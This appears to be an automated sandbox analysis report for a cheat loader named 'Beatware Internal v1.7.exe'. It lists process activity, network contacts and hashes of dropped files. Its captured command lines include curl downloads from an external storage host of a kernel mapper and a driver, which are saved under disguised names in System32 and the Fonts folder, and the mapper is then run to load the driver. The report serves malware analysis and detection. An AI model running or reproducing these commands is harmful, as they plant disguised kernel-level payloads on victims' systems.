PID 2368 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2368 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2368 wrote to memory of 3888 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 3888 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 3216 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3216 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa756c46f8,0x7ffa756c4708,0x7ffa756c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe >nul 2>&1

C:\Windows\system32\curl.exe

curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys >nul 2>&1

C:\Windows\system32\curl.exe

curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys

C:\Windows\System32\gainlol.exe

C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll >nul 2>&1

C:\Windows\system32\curl.exe

curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll

Network

Country Destination Domain Proto
N/A 127.0.0.1:58111 tcp
N/A 127.0.0.1:58113 tcp
US 8.8.8.8:53 keyauth.win udp
US 104.26.1.5:443 keyauth.win tcp
US 8.8.8.8:53 5.1.26.104.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 beatware.xyz udp
US 104.21.71.116:443 beatware.xyz tcp
US 8.8.8.8:53 dsc.gg udp
US 104.21.7.223:443 dsc.gg tcp
US 8.8.8.8:53 116.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 r.dsc.gg udp
US 172.67.156.126:443 r.dsc.gg tcp
US 8.8.8.8:53 discord.gg udp
US 162.159.135.234:443 discord.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 126.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 223.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 234.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:6463 tcp
N/A 127.0.0.1:6464 tcp
N/A 127.0.0.1:6465 tcp
N/A 127.0.0.1:6466 tcp
N/A 127.0.0.1:6467 tcp
N/A 127.0.0.1:6468 tcp
N/A 127.0.0.1:6469 tcp
N/A 127.0.0.1:6470 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
N/A 127.0.0.1:6471 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 127.0.0.1:6472 tcp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 104.26.1.5:443 keyauth.win tcp
N/A 127.0.0.1:58918 tcp
N/A 127.0.0.1:58920 tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 99.23.217.172.in-addr.arpa udp
US 136.0.77.2:443 link.storjshare.io tcp

Files

memory/2368-2-0x00007FF703D45000-0x00007FF7040AE000-memory.dmp

memory/2368-0-0x00007FFA934D0000-0x00007FFA934D2000-memory.dmp

memory/2368-1-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4158365912175436289496136e7912c2
SHA1 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA512 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

\??\pipe\LOCAL\crashpad_1664_PHBJICYFAMBTWROL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ce4c898f8fc7601e2fbc252fdadb5115
SHA1 01bf06badc5da353e539c7c07527d30dccc55a91
SHA256 bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA512 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 65c20bdd4eb8f14964b28dfc4d0a6773
SHA1 072e35d6c38f81b6bfe03b4c69a251a4c2e691fb
SHA256 75191e827aed4adab9c9cffab8af12697001e638e69a165f4913ad2c19f60efe
SHA512 d0f7a509be8e03918db5a792af1a0ff8440a8b8e007b07ffe6a83fc4293cb981eaf3a3450e06d3ecd9cf19bda879226c5de9e6cf0951e76143497659b1a50228

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2aa3f89bf8ceae149183ec7b13d3b1c8
SHA1 2d79f8ad06aab48d390cd87cdc90ace9b6886a6b
SHA256 7d3d3319680d754de02eda14ec16317585e4f2fb86ceaa4c9da99fa23c3c2a9f
SHA512 6b5307e5116df523566b85de7337a063579b2c50dd815c7f8d03cc4b298bb56864273e63633937e7b154727d29d578e1dfac2763cbe6c278319fa10a1565aef9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a75a306c798be92962313a82e867581e
SHA1 608046ba43753fee98e349933fd26c01eb3f28f3
SHA256 5a11855473cae7c3149f7655fd4ba3a8675ca38fb81bcba2dfb0bc79bb11e8e2
SHA512 4de83eeb0e36b8263ecd1af76798c1aa95bf6cb57e04e827ccfbb93dd6f558340c75e76a93c83b25cb5acca114699ad620a46fb6405bca87e4ce803b19fcf58c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c352495e5e6d50640db63ac16db2c406
SHA1 120422b4ef3e0a5fa97783b370dfe22fe254cf47
SHA256 d1e121f5e5f3be47248e9973aed3669bc82b161627b3a622e060139098e4a3b6
SHA512 7691a97c81ffa63ec4199b5c89c7e2abad237ad17d422d8b040036f548869235651ebcbd75ba132a5fe070504d57c472f097cceee7700fa1bec2b4fbc90f26a8

memory/2368-166-0x00007FF703D45000-0x00007FF7040AE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 bca98d1cf3fe8e6f9e3aa8861ec4f2b4
SHA1 f746415ea8e413db5e07096f4aeb7a14dd78b706
SHA256 29054e1b14d297b31776563bf65250c6c6a750c8957f8c94e9368702ea37ed4f
SHA512 d0124575b26fbae936ccf20aa11a6d14d00d8b0df9e8c20a2a9d1c1bc6750ea1ea34b83deff2c07c571ae11e1c29a58aa05b3948e56ede9279134de367212fd7

memory/2368-174-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp

C:\Windows\System32\gainlol.exe

MD5 e25351a9dd41d1c339530c465fe18569
SHA1 2461491598a2ab092b352f2caf375accde6e9d85
SHA256 d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869
SHA512 888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1

C:\Windows\Fonts\arial.sys

MD5 334061e143b54efcbd9e17a51854dc02
SHA1 16bd1ab01326758ed4c7b0c7ac19847dc7bd6c58
SHA256 90fb91509b573966184a35ca1a23d212fb97fdb67b6a3e6ec881ed1cf5dba474
SHA512 fb4c7ec8b9a002bc03e3596cde7aa62d07d1e72d2ee587ba6044f6a66c765a1d610a83730589657fc2bdd5cb52521a02d9fdbce6ef92f3f91588775adf18ba72